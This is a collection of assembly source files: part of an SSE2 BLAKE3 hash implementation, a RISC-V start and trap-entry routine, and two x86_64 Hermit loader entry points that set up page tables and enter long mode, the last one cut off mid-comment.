pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x39
pshufd xmm8, xmm8, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x93
pshufd xmm10, xmm10, 0x93
dec al
je 9f
movdqa xmm12, xmmword ptr [rsp+0x20]
movdqa xmm5, xmmword ptr [rsp+0x40]
pshufd xmm13, xmm12, 0x0F
shufps xmm12, xmm5, 214
pshufd xmm4, xmm12, 0x39
movdqa xmm12, xmm6
shufps xmm12, xmm7, 250
pand xmm13, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm12, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm13, xmm12
movdqa xmmword ptr [rsp+0x20], xmm13
movdqa xmm12, xmm7
punpcklqdq xmm12, xmm5
movdqa xmm13, xmm6
pand xmm12, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm13, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm12, xmm13
pshufd xmm12, xmm12, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmmword ptr [rsp+0x40], xmm12
movdqa xmm5, xmmword ptr [rsp+0x30]
movdqa xmm13, xmmword ptr [rsp+0x50]
pshufd xmm6, xmm5, 0x0F
shufps xmm5, xmm13, 214
pshufd xmm12, xmm5, 0x39
movdqa xmm5, xmm14
shufps xmm5, xmm15, 250
pand xmm6, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm5, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm6, xmm5
movdqa xmm5, xmm15
punpcklqdq xmm5, xmm13
movdqa xmmword ptr [rsp+0x30], xmm2
movdqa xmm2, xmm14
pand xmm5, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm2, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm5, xmm2
movdqa xmm2, xmmword ptr [rsp+0x30]
pshufd xmm5, xmm5, 0x78
punpckhdq xmm13, xmm15
punpckldq xmm14, xmm13
pshufd xmm15, xmm14, 0x1E
movdqa xmm13, xmm6
movdqa xmm14, xmm5
movdqa xmm5, xmmword ptr [rsp+0x20]
movdqa xmm6, xmmword ptr [rsp+0x40]
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm8, xmm10
pxor xmm9, xmm11
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
movups xmmword ptr [rbx+0x20], xmm8
movups xmmword ptr [rbx+0x30], xmm9
mov eax, dword ptr [rsp+0x130]
neg eax
mov r10d, dword ptr [rsp+0x110+8*rax]
mov r11d, dword ptr [rsp+0x120+8*rax]
mov dword ptr [rsp+0x110], r10d
mov dword ptr [rsp+0x120], r11d
add rdi, 16
add rbx, 64
sub rsi, 2
3:
test esi, 0x1
je 4b
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movd xmm13, dword ptr [rsp+0x110]
movd xmm14, dword ptr [rsp+0x120]
punpckldq xmm13, xmm14
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
shl rax, 32
or rax, 64
movq xmm12, rax
movdqa xmm3, xmm13
punpcklqdq xmm3, xmm12
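# rax = (flags << 32) | 64 (the block length); combined with the counter
# pair in xmm13 this builds the fourth state row
# [counter_lo, counter_hi, block_len, flags]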
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pand xmm9, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm8, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm9, xmm8
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
movdqa xmm10, xmm6
pand xmm8, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm10, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm8, xmm10
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
jmp 4b
.p2align 6
blake3_compress_in_place_sse2:
_blake3_compress_in_place_sse2:
_CET_ENDBR
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
shl r8, 32
add rdx, r8
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
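# xmm3 = [counter_lo, counter_hi, block_len, flags]: the fourth row of the
# compression state (rows 0-1 are the chaining value, row 2 the first four
# IV words)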
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
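# xmm4-xmm7 now hold the 16 message words, de-interleaved into even/odd
# groups (shufps 136/221) and pre-rotated (pshufd 0x93) into the order the
# round loop consumes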
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pand xmm9, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm8, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm9, xmm8
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
movdqa xmm10, xmm6
pand xmm8, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm10, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm8, xmm10
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
movups xmmword ptr [rdi], xmm0
movups xmmword ptr [rdi+0x10], xmm1
ret
.p2align 6
blake3_compress_xof_sse2:
_blake3_compress_xof_sse2:
_CET_ENDBR
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pand xmm9, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm8, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm9, xmm8
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
movdqa xmm10, xmm6
pand xmm8, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm10, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm8, xmm10
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
movdqu xmm4, xmmword ptr [rdi]
movdqu xmm5, xmmword ptr [rdi+0x10]
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm2, xmm4
pxor xmm3, xmm5
movups xmmword ptr [r9], xmm0
movups xmmword ptr [r9+0x10], xmm1
movups xmmword ptr [r9+0x20], xmm2
movups xmmword ptr [r9+0x30], xmm3
ret
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
.p2align 6
BLAKE3_IV:
.long 0x6A09E667, 0xBB67AE85
.long 0x3C6EF372, 0xA54FF53A
ADD0:
.long 0, 1, 2, 3
ADD1:
.long 4, 4, 4, 4
BLAKE3_IV_0:
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
BLAKE3_BLOCK_LEN:
.long 64, 64, 64, 64
CMP_MSB_MASK:
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
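# SSE2 has no pblendw; the masks below reproduce the SSE4.1 blends used in
# the message permutation via pand/pand/por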
PBLENDW_0x33_MASK:
.long 0xFFFFFFFF, 0x00000000, 0xFFFFFFFF, 0x00000000
PBLENDW_0xCC_MASK:
.long 0x00000000, 0xFFFFFFFF, 0x00000000, 0xFFFFFFFF
PBLENDW_0x3F_MASK:
.long 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0x00000000
PBLENDW_0xC0_MASK:
.long 0x00000000, 0x00000000, 0x00000000, 0xFFFFFFFF
|
mm-zk/eravm_risc | 3,344 | asm/asm_reduced.S | /*
Entry point of all programs (_start).
It initializes DWARF call frame information, the stack pointer, the
frame pointer (needed for closures to work in start_rust) and the global
pointer. Then it calls _start_rust.
*/
.section .init, "ax"
.global _start
_start:
/* Jump to the absolute address defined by the linker script. */
// for 32bit
# lui ra, %hi(_abs_start)
# jr %lo(_abs_start)(ra)
la ra, _abs_start
jr ra
_abs_start:
.cfi_startproc
.cfi_undefined ra
.option push
.option norelax
la gp, __global_pointer$
.option pop
// Assume a single core, and set SP to the top address of the stack region
la sp, _sstack
// Set frame pointer
add s0, sp, zero
jal zero, _start_rust
.cfi_endproc
/*
Machine trap entry point (_machine_start_trap)
*/
.section .trap, "ax"
.global machine_default_start_trap
.align 4
machine_default_start_trap:
// We assume that the exception stack pointer is always kept in MSCRATCH,
// so we swap it with x31
csrrw x31, mscratch, x31
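// csrrw swaps atomically: x31 now points at the top of the exception
// stack, while mscratch temporarily holds the interrupted x31 (it is
// stored to the stack further down)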
// write to exception stack
# sw x31, -4(sp)
sw x30, -8(x31)
sw x29, -12(x31)
sw x28, -16(x31)
sw x27, -20(x31)
sw x26, -24(x31)
sw x25, -28(x31)
sw x24, -32(x31)
sw x23, -36(x31)
sw x22, -40(x31)
sw x21, -44(x31)
sw x20, -48(x31)
sw x19, -52(x31)
sw x18, -56(x31)
sw x17, -60(x31)
sw x16, -64(x31)
sw x15, -68(x31)
sw x14, -72(x31)
sw x13, -76(x31)
sw x12, -80(x31)
sw x11, -84(x31)
sw x10, -88(x31)
sw x9, -92(x31)
sw x8, -96(x31)
sw x7, -100(x31)
sw x6, -104(x31)
sw x5, -108(x31)
sw x4, -112(x31)
sw x3, -116(x31)
sw x2, -120(x31)
sw x1, -124(x31)
// we will not restore it, so it is safe to skip this write
# sw x0, -128(x31)
// move the valid sp into a0
mv a0, x31
csrrw x31, mscratch, x0
sw x31, -4(a0)
// restore sp
mv sp, a0
// sp is valid now
addi sp, sp, -128
// pass pointer as first argument
add a0, sp, zero
jal ra, _machine_start_trap_rust
// set return address into mepc
csrw mepc, a0
// save original SP to mscratch for now
lw a0, 8(sp) // the original sp that we saved on the stack
csrw mscratch, a0 // save it for now
// restore everything we saved
// loading into x0 has no effect (writes to x0 are discarded), so we skip it
# lw x0, 0(sp)
lw x1, 4(sp)
# lw x2, 8(sp) // do not overwrite SP yet
lw x3, 12(sp)
lw x4, 16(sp)
lw x5, 20(sp)
lw x6, 24(sp)
lw x7, 28(sp)
lw x8, 32(sp)
lw x9, 36(sp)
lw x10, 40(sp)
lw x11, 44(sp)
lw x12, 48(sp)
lw x13, 52(sp)
lw x14, 56(sp)
lw x15, 60(sp)
lw x16, 64(sp)
lw x17, 68(sp)
lw x18, 72(sp)
lw x19, 76(sp)
lw x20, 80(sp)
lw x21, 84(sp)
lw x22, 88(sp)
lw x23, 92(sp)
lw x24, 96(sp)
lw x25, 100(sp)
lw x26, 104(sp)
lw x27, 108(sp)
lw x28, 112(sp)
lw x29, 116(sp)
lw x30, 120(sp)
lw x31, 124(sp)
addi sp, sp, 128
// we popped everything from the stack
// now save current exception SP to mscratch,
// and put original SP back
csrrw sp, mscratch, sp
mret
/* Make sure there is an abort when linking */
.section .text.abort
.globl abort
abort:
j abort |
moehr1z/loader | 5,267 | src/arch/x86_64/entry_fc.s | # This is the kernel's entry point when Hermit is running under
# FireCracker. FireCracker assumes a 64-bit Linux kernel.
.code32
.set BOOT_STACK_SIZE, 4096
.extern loader_start # defined in linker script
.extern loader_end
.section .mboot, "a"
.align 8
.align 4
# we already need a valid GDT to switch into 64-bit mode
GDT64: # Global Descriptor Table (64-bit).
.set GDT64.Null, . - GDT64 # The null descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0 # Access.
.byte 0 # Granularity.
.byte 0 # Base (high).
.set GDT64.Code, . - GDT64 # The code descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10011010 # Access.
.byte 0b00100000 # Granularity.
.byte 0 # Base (high).
.set GDT64.Data, . - GDT64 # The data descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10010010 # Access.
.byte 0b00000000 # Granularity.
.byte 0 # Base (high).
GDT64.Pointer: # The GDT-pointer.
.2byte . - GDT64 - 1 # Limit.
.8byte GDT64 # Base.
.section .text
.align 4
.global _start
_start:
cli # avoid any interrupt
# Initialize stack pointer
mov esp, OFFSET boot_stack
add esp, BOOT_STACK_SIZE - 16
mov [boot_params], esi
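# per the Linux boot protocol that FireCracker follows, esi carries the
# pointer to the boot_params structure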
# This will set up the x86 control registers:
# Caching and the floating point unit are enabled.
# Bootstrap page tables are loaded, and page size
# extensions (huge pages) are enabled.
cpu_init:
# initialize page tables
# map kernel 1:1
push edi
push ebx
push ecx
mov ecx, OFFSET loader_start
mov ebx, OFFSET loader_end
add ebx, 0x1000
L0: cmp ecx, ebx
jae L1
mov eax, ecx
and eax, 0xFFFFF000 # page align lower half
mov edi, eax
shr edi, 9 # (edi >> 12) * 8 (index for boot_pgt)
add edi, OFFSET boot_pgt1
or eax, 0x3 # set present and writable bits
mov [edi], eax
add ecx, 0x1000
jmp L0
L1:
pop ecx
pop ebx
pop edi
# check for long mode
# do we have the instruction cpuid?
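# classic detection trick: if we can toggle EFLAGS bit 21 (the ID flag),
# the CPU supports the cpuid instruction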
pushfd
pop eax
mov ecx, eax
xor eax, 1 << 21
push eax
popfd
pushfd
pop eax
push ecx
popfd
xor eax, ecx
jz Linvalid
# cpuid > 0x80000000?
mov eax, 0x80000000
cpuid
cmp eax, 0x80000001
jb Linvalid # It is less, there is no long mode.
# do we have a long mode?
mov eax, 0x80000001
cpuid
test edx, 1 << 29 # Test if the LM-bit, which is bit 29, is set in the D-register.
jz Linvalid # They aren't, there is no long mode.
# Set CR3
mov eax, OFFSET boot_pml4
# or eax, (1 << 0) # set present bit
mov cr3, eax
# we need to enable PAE mode
mov eax, cr4
or eax, 1 << 5
mov cr4, eax
# switch to the compatibility mode (which is part of long mode)
mov ecx, 0xC0000080
rdmsr
or eax, 1 << 8
wrmsr
# Set CR4
mov eax, cr4
and eax, 0xfffbf9ff # disable SSE
# or eax, (1 << 7) # enable PGE
mov cr4, eax
# Set CR0 (PM-bit is already set)
mov eax, cr0
and eax, ~(1 << 2) # disable FPU emulation
or eax, (1 << 1) # enable FPU monitoring
and eax, ~(1 << 30) # enable caching
and eax, ~(1 << 29) # disable write-through caching
and eax, ~(1 << 16) # allow kernel write access to read-only pages
or eax, (1 << 31) # enable paging
mov cr0, eax
lgdt [GDT64.Pointer] # Load the 64-bit global descriptor table.
# https://github.com/llvm/llvm-project/issues/46048
.att_syntax prefix
# Set the code segment and enter 64-bit long mode.
ljmp $GDT64.Code, $start64
.intel_syntax noprefix
# there is no long mode
Linvalid:
jmp Linvalid
.code64
start64:
# initialize segment registers
mov ax, OFFSET GDT64.Data
mov ds, eax
mov es, eax
mov ss, eax
xor ax, ax
mov fs, eax
mov gs, eax
cld
# set default stack pointer
movabs rsp, OFFSET boot_stack
add rsp, BOOT_STACK_SIZE-16
# jump to the boot processor's C code
.extern loader_main
jmp loader_main
jmp start64+0x28
.section .data
.global mb_info
.align 8
mb_info:
.8byte 0
.global boot_params
.align 8
boot_params:
.8byte 0
.align 4096
.global boot_stack
boot_stack:
.fill BOOT_STACK_SIZE, 1, 0xcd
# Bootstrap page tables are used during the initialization.
.align 4096
boot_pml4:
.8byte boot_pdpt + 0x3 # PG_PRESENT | PG_RW
.fill 510, 8, 0 # PAGE_MAP_ENTRIES - 2
.8byte boot_pml4 + 0x3 # PG_PRESENT | PG_RW
boot_pdpt:
.8byte boot_pgd + 0x3 # PG_PRESENT | PG_RW
.fill 511, 8, 0 # PAGE_MAP_ENTRIES - 1
boot_pgd:
.8byte boot_pgt1 + 0x3 # PG_PRESENT | PG_RW
.8byte boot_pgt2 + 0x3 # PG_PRESENT | PG_RW
.fill 510, 8, 0 # PAGE_MAP_ENTRIES - 1
boot_pgt1:
.fill 512, 8, 0
boot_pgt2:
.fill 512, 8, 0
|
moehr1z/loader | 6,171 | src/arch/x86_64/entry.s | # This is the kernel's entry point. We could either call main here,
# or we can use this to set up the stack or other nice stuff, like
# perhaps setting up the GDT and segments. Please note that interrupts
# are disabled at this point: more on interrupts later!
.code32
.set BOOT_STACK_SIZE, 4096
.extern loader_start # defined in linker script
.extern loader_end
# We use a special name to map this section at the beginning of our kernel
# => Multiboot expects its magic number at the beginning of the kernel.
.section .mboot, "a"
# This part MUST be 4-byte aligned, so we solve that issue using '.align 4'.
.align 4
mboot:
# Multiboot macros to make a few lines more readable later
.set MULTIBOOT_PAGE_ALIGN, (1 << 0)
.set MULTIBOOT_MEMORY_INFO, (1 << 1)
.set MULTIBOOT_HEADER_MAGIC, 0x1BADB002
.set MULTIBOOT_HEADER_FLAGS, MULTIBOOT_PAGE_ALIGN | MULTIBOOT_MEMORY_INFO
.set MULTIBOOT_CHECKSUM, -(MULTIBOOT_HEADER_MAGIC + MULTIBOOT_HEADER_FLAGS)
# This is the GRUB Multiboot header, which doubles as the boot signature.
.4byte MULTIBOOT_HEADER_MAGIC
.4byte MULTIBOOT_HEADER_FLAGS
.4byte MULTIBOOT_CHECKSUM
.4byte 0, 0, 0, 0, 0 # address fields
.align 4
# we already need a valid GDT to switch into 64-bit mode
GDT64: # Global Descriptor Table (64-bit).
.set GDT64.Null, . - GDT64 # The null descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0 # Access.
.byte 0 # Granularity.
.byte 0 # Base (high).
.set GDT64.Code, . - GDT64 # The code descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10011010 # Access.
.byte 0b00100000 # Granularity.
.byte 0 # Base (high).
.set GDT64.Data, . - GDT64 # The data descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10010010 # Access.
.byte 0b00000000 # Granularity.
.byte 0 # Base (high).
GDT64.Pointer: # The GDT-pointer.
.2byte . - GDT64 - 1 # Limit.
.8byte GDT64 # Base.
.section .text
.align 4
.global _start
_start:
cli # avoid any interrupt
# Initialize stack pointer
mov esp, OFFSET boot_stack
add esp, BOOT_STACK_SIZE - 16
# Interpret multiboot information
mov [mb_info], ebx
# This will set up the x86 control registers:
# Caching and the floating point unit are enabled
# Bootstrap page tables are loaded and page size
# extensions (huge pages) enabled.
cpu_init:
# initialize page tables
# map kernel 1:1
push edi
push ebx
push ecx
mov ecx, OFFSET loader_start
mov ebx, OFFSET loader_end
add ebx, 0x1000
L0: cmp ecx, ebx
jae L1
mov eax, ecx
and eax, 0xFFFFF000 # page align lower half
mov edi, eax
shr edi, 9 # (edi >> 12) * 8 (index for boot_pgt)
add edi, OFFSET boot_pgt1
or eax, 0x3 # set present and writable bits
mov [edi], eax
add ecx, 0x1000
jmp L0
L1:
pop ecx
pop ebx
pop edi
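# Note on the index math above (for illustration): for a page at address A,
# the slot is boot_pgt1 + (A >> 12) * 8, and since eax is already masked to
# a 4 KiB boundary, (A >> 12) * 8 == A >> 9, so a single 'shr edi, 9' suffices.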
# check for long mode
# do we have the instruction cpuid?
pushfd
pop eax
mov ecx, eax
xor eax, 1 << 21
push eax
popfd
pushfd
pop eax
push ecx
popfd
xor eax, ecx
jz Linvalid
# cpuid > 0x80000000?
mov eax, 0x80000000
cpuid
cmp eax, 0x80000001
jb Linvalid # It is less, there is no long mode.
# do we have a long mode?
mov eax, 0x80000001
cpuid
test edx, 1 << 29 # Test if the LM-bit, which is bit 29, is set in the D-register.
jz Linvalid # They aren't, there is no long mode.
# Set CR3
mov eax, OFFSET boot_pml4
# or eax, (1 << 0) # set present bit
mov cr3, eax
# we need to enable PAE mode
mov eax, cr4
or eax, 1 << 5
mov cr4, eax
# switch to the compatibility mode (which is part of long mode)
mov ecx, 0xC0000080
rdmsr
or eax, 1 << 8
wrmsr
# Set CR4
mov eax, cr4
and eax, 0xfffbf9ff # disable SSE
# or eax, (1 << 7) # enable PGE
mov cr4, eax
# Set CR0 (PM-bit is already set)
mov eax, cr0
and eax, ~(1 << 2) # disable FPU emulation
or eax, (1 << 1) # enable FPU monitoring
and eax, ~(1 << 30) # enable caching
and eax, ~(1 << 29) # disable write through caching
and eax, ~(1 << 16) # allow kernel write access to read-only pages
or eax, (1 << 31) # enable paging
mov cr0, eax
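# CR0 bits touched above, for reference (names are illustrative, not used below):
#   bit 1  MP - FPU monitoring        bit 2  EM - FPU emulation
#   bit 16 WP - ring-0 write protect of read-only pages
#   bit 29 NW - not write-through     bit 30 CD - cache disable
#   bit 31 PG - paging enable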
lgdt [GDT64.Pointer] # Load the 64-bit global descriptor table.
# https://github.com/llvm/llvm-project/issues/46048
.att_syntax prefix
# Set the code segment and enter 64-bit long mode.
ljmp $GDT64.Code, $start64
.intel_syntax noprefix
# there is no long mode
Linvalid:
jmp Linvalid
.code64
start64:
# initialize segment registers
mov ax, OFFSET GDT64.Data
mov ds, eax
mov es, eax
mov ss, eax
xor ax, ax
mov fs, eax
mov gs, eax
cld
# set default stack pointer
movabs rsp, OFFSET boot_stack
add rsp, BOOT_STACK_SIZE-16
# jump to the boot processor's C code
.extern loader_main
jmp loader_main
jmp start64+0x28
.section .data
.global mb_info
.align 8
mb_info:
.8byte 0
.align 4096
.global boot_stack
boot_stack:
.fill BOOT_STACK_SIZE, 1, 0xcd
# Bootstrap page tables are used during the initialization.
.align 4096
boot_pml4:
.8byte boot_pdpt + 0x3 # PG_PRESENT | PG_RW
.fill 510, 8, 0 # PAGE_MAP_ENTRIES - 2
.8byte boot_pml4 + 0x3 # PG_PRESENT | PG_RW
boot_pdpt:
.8byte boot_pgd + 0x3 # PG_PRESENT | PG_RW
.fill 511, 8, 0 # PAGE_MAP_ENTRIES - 1
boot_pgd:
.8byte boot_pgt1 + 0x3 # PG_PRESENT | PG_RW
.8byte boot_pgt2 + 0x3 # PG_PRESENT | PG_RW
.fill 510, 8, 0 # PAGE_MAP_ENTRIES - 1
boot_pgt1:
.fill 512, 8, 0
boot_pgt2:
.fill 512, 8, 0
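# Mapping sketch: boot_pml4[0] -> boot_pdpt[0] -> boot_pgd[0..1] ->
# boot_pgt1/boot_pgt2, i.e. up to 4 MiB of identity-mapped 4 KiB pages for
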